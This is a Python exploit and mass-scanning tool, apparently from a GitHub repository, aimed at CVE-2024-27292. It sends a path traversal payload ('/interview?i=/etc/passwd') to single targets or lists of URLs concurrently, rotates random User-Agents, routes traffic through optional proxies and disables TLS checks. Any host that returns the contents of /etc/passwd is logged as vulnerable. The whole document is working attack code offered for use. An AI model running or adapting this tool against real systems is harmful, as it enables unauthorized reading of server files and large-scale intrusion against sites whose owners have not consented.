README.md
Rendering markdown...
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
from fake_useragent import UserAgent
from colorama import Fore, Style
import ssl
import httpx
import random
import os
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner=f"""{bold}{random_color}
____ __ __ _____ _ _ _
/ ___|\ \ / /| ____|| | | | _ _ _ __ | |_ ___ _ __
| | \ \ / / | _| | |_| || | | || '_ \ | __| / _ \| '__|
| |___ \ V / | |___ | _ || |_| || | | || |_ | __/| |
\____| \_/ |_____||_| |_| \__,_||_| |_| \__| \___||_|
CVE-2024-27292 {bold}{white}@th3gokul{reset}\n"""
return banner
print (banner())
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-27292" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}]")
args=parser.parse_args()
async def save(result):
try:
if args.output:
if os.path.isfile(args.output):
filename = args.output
elif os.path.isdir(args.output):
filename = os.path.join(args.output, f"results.txt")
else:
filename = args.output
else:
filename = "results.txt"
async with aiofiles.open(filename, "a") as w:
await w.write(result + '\n')
except KeyboardInterrupt as e:
quit()
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
pass
async def exploit(session,url,sem,bar):
try:
base_url=f'{url}/interview?i=/etc/passwd'
header={
"User-Agent": UserAgent().random
}
async with session.stream("GET", base_url, headers=header , follow_redirects=True , timeout=30) as response:
response = await response.aread()
response = response.decode("utf-8")
if "root:" in response:
print(f"{bold}{white}[vuln]: {url}{reset}")
await save(f"Vulnerable: {base_url}")
except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
if args.verbose:
print(f"[{bold}{red}Timeout{reset}]: {bold}{white}{url}{reset}")
except ssl.SSLError as e:
pass
except httpx.InvalidURL:
pass
except KeyboardInterrupt :
SystemExit
except asyncio.CancelledError:
SystemExit
except Exception as e:
if args.verbose:
print(f"Exception in exploit: {e}, {type(e)}")
finally:
bar()
sem.release()
async def loader(urls, session, sem, bar):
try:
tasks = []
for url in urls:
await sem.acquire()
task = asyncio.ensure_future(exploit(session, url, sem, bar))
tasks.append(task)
await asyncio.gather(*tasks, return_exceptions=False)
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
if args.verbose:
print(f"Exception in loader: {e}, {type(e)}")
async def threads(urls):
try:
urls = list(set(urls))
sem = asyncio.BoundedSemaphore(args.threads)
proxy = args.proxy if args.proxy else None
async with httpx.AsyncClient(verify=False, proxy=proxy) as session:
with alive_bar(title=f"CVEHunter", total=len(urls), enrich_print=False) as bar:
await loader(urls, session, sem, bar)
except RuntimeError as e:
pass
except KeyboardInterrupt as e:
SystemExit
except Exception as e:
if args.verbose:
print(f"Exception in threads: {e}, {type(e)}")
async def main():
try:
urls = []
if args.url:
if args.url.startswith("https://") or args.url.startswith("http://"):
urls.append(args.url)
else:
new_url = f"https://{args.url}"
urls.append(new_url)
new_http = f"http://{args.url}"
urls.append(new_http)
await threads(urls)
if args.list:
async with aiofiles.open(args.list, "r") as streamr:
async for url in streamr:
url = url.strip()
if url.startswith("https://") or url.startswith("http://"):
urls.append(url)
else:
new_url = f"https://{url}"
urls.append(new_url)
new_http = f"http://{url}"
urls.append(new_http)
await threads(urls)
except FileNotFoundError as e:
print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
SystemExit
except Exception as e:
print(f"Exception in main: {e}, {type(e)}")
if __name__ == "__main__":
asyncio.run(main())